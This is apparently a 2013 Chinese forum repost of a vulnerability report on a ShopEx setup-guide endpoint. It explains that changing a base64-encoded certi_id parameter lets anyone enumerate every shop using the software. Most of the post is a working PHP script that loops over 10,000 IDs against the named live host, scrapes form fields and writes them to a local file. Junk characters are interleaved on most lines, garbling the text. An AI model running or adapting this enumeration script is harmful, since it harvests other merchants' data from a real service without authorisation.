|
|
简要描述:/ l( U9 |9 c3 u1 x) S
ShopEx某接口缺陷,可遍历所有网站
" m+ f% @5 j/ s, G/ J" Z9 {0 D详细说明:
% f @3 l: o8 l问题出现在shopex 网店使用向导页面
$ O4 l4 U. t; V7 i+ J; h9 l3 V6 Q1 f; e1 `2 H: V
! w5 u% o, k! E; D
! h4 |# i5 F8 S: |3 O: zhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=$ g5 G. i! m" q: u& B
. X, ?, R. o( y. w) |8 J5 t- w
/ v4 E# j1 K& [4 `8 P+ {
9 }6 X X& o& q. w3 b5 Frefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}. r: D5 s0 [' P
/ h; b4 V, b5 ?" p. d; F
* V# X5 o' R* ]3 ^$ @
7 [' [1 J; E7 m! @* ~: f, k; v我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
+ J9 j: V8 W% _( U% u, v; g
% m/ X l9 w" j! Q& ]% k+ D y6 J3 ^9 n# w
+ n! G2 b; r0 B<?php
( e { J6 F8 `" R7 y9 v# w
% F" w" c# @9 o7 q for ($i=1; $i < 10000; $i++) { //遍历
8 a. {0 b+ M z; |1 X9 W# Q) c( l' u9 U( N& P! }, r
ShowshopExD($i);1 h* @: I `& n6 m2 `) M; y6 E% @" U+ C
7 `5 I+ D3 e" S6 x% ]4 i" B7 s
}5 s) @2 l$ n# l3 \' f) N; n2 |5 W
; ~2 W) o' v. S+ B. P function ShowshopExD($cid) {3 M$ _! t& X9 O$ i& r* I
5 }, [- D1 D9 I0 j3 ?
$url='http://guide.ecos.shopex.cn/step2.php';: U5 u, c& ~5 o o- E# u8 u8 D( M
3 N- x& w0 f1 V! P; K $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
* R6 ?* W* S) X$ U4 Z8 n6 D0 |
, f: s8 Y# _ K+ M $url = $url.'?refer='.$refer;* Z% t7 ]- D! Z1 Y9 D2 ~1 f7 U
1 J7 Y/ \% S6 H2 R1 S7 m/ A $ch = curl_init($url);' J: I0 ^( j+ x0 V( E- X
) P4 Z5 T) G& Q; C& p# k
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;5 F. n: j% v: ?4 {. V3 z3 X
( O: x! J3 r. }+ |+ F4 e
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
, |. j" L7 p- x" [9 K2 T
) v. `- m. t4 c z9 H$ Q8 G0 U# w $result = curl_exec($ch);
+ E! ~6 c' a8 c$ I+ Y% N$ D- a. B8 i
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
8 I6 d( G5 J) u$ k! c8 n
, D; R( o3 e6 ^5 t2 [( ~1 f if(strpos($result,$refer))! u& v- o4 M* s4 x( I& ~) @- w
/ l; y2 E$ V# a. J( O* l; A1 G2 E {
7 {" Q/ g2 z4 s8 S: X
8 A" w" |5 F2 I8 A/ F $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
5 {* r( t/ Z3 p$ S3 O/ R3 F9 O# ~, s6 P0 L1 G
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);; x- G6 l7 H5 W
* X. ?& P8 q- P foreach ($value[1] as $key) {0 N J9 f. u0 k2 t! J6 O
4 v. u8 z" E( L" \& |8 t2 }2 l preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);8 T: |% n' P9 S/ Z6 n9 q- W( a
) R6 A5 e5 k) X echo $res[1][0].':'.$res[3][0]."\r\n";0 g6 A8 W/ h, M0 t) P
9 p; O2 G4 f v) _
$col =$res[1][0].':'.$res[3][0]."\r\n";
: m3 G1 H$ k5 O. Y+ r6 y+ U' e% u' D9 j8 ~
fwrite($fp, $col, strlen($col));
4 ^( e0 ]! V3 R K! ?6 {( A1 V+ C4 l: T5 S8 f0 g
}
$ y3 V8 Z. i# @6 b6 @
% @" J& b! Y( @. H! t9 s echo '--------------------------------'."\r\n";
2 ~" C1 Q9 c% ~) a3 b- X% K' D% x i7 E& ?. W
fclose($fp); & X4 z j: J/ t I, D+ h! ^
( g# t% }4 J3 _$ v9 G' `: c1 g }) s" d( v# ]- e. a+ _7 E2 m' _
3 i. {) A% Q- C/ ~) v R# t
flush();
( r+ [" O, i0 a
2 T9 p! f* A4 p8 P' O# T I. H( o curl_close($ch);
/ u1 Q0 `% z/ h* V! P% i# X
+ X& T2 B- Q6 A8 l- H- m( T1 j' p }
( y5 m/ G0 e6 S% L- A; ^( z
, |& b. _2 ]" \6 k?>
0 ~2 }& v: J+ ]8 G0 T$ f漏洞证明:" g: f. k `( Q+ @& l5 u
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg( ~ C3 B7 t; I: |0 A3 b
refer换成其他加密方式- ?' Z0 G6 W7 J- e. C$ c" s
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对